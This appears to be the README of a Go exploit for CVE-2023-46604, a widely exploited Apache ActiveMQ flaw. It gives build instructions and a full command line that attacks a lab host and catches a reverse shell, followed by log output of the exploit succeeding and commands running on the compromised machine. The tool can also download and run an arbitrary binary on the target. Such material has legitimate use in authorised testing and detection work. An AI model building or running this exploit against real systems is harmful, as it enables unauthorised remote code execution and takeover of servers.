CVE-2023-46604 is a widely exploited vulnerability that appears on CISA's KEV list. This go-exploit implementation can execute a reverse shell on the target using a Nashorn payload, or download a binary to the target and execute it.
To build the exploit into a Docker image, simply run:

```
make docker
```

If you have a Go build environment handy, you can also just use `make`:

```
albinolobster@mournland:~/cve-2023-46604$ make
gofmt -d -w cve-2023-46604.go
golangci-lint run --fix cve-2023-46604.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-46604_linux-arm64 cve-2023-46604.go
albinolobster@mournland:~/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -v -c -e -rhost 10.9.49.129 -rport 61616 -lhost 10.9.49.131 -lport 1270 -httpAddr 10.9.49.131 -c2 SimpleShellServer
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.129 port=61616 ssl=false "ssl auto"=false
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Validating ActiveMQ target" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.398-05:00 level=SUCCESS msg="Target validation succeeded!" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.398-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.465-05:00 level=VERSION msg="The self-reported version is: 5.18.2" host=10.9.49.129 port=61616 version=5.18.2
time=2023-11-09T16:07:48.465-05:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.465-05:00 level=STATUS msg="HTTP server listening for 10.9.49.131:8080/JbmoWIDSyYqW"
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg=Connecting...
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg="Sending exploit"
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg="Exploit successfully completed"
time=2023-11-09T16:07:50.510-05:00 level=STATUS msg="Sending payload"
time=2023-11-09T16:07:50.516-05:00 level=STATUS msg="Sending payload"
time=2023-11-09T16:07:50.657-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.129:37034"
time=2023-11-09T16:07:50.657-05:00 level=STATUS msg="Active shell from 10.9.49.129:37034"
id
uid=1000(albinolobster) gid=1000(albinolobster) groups=1000(albinolobster),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare)
whoami
albinolobster
```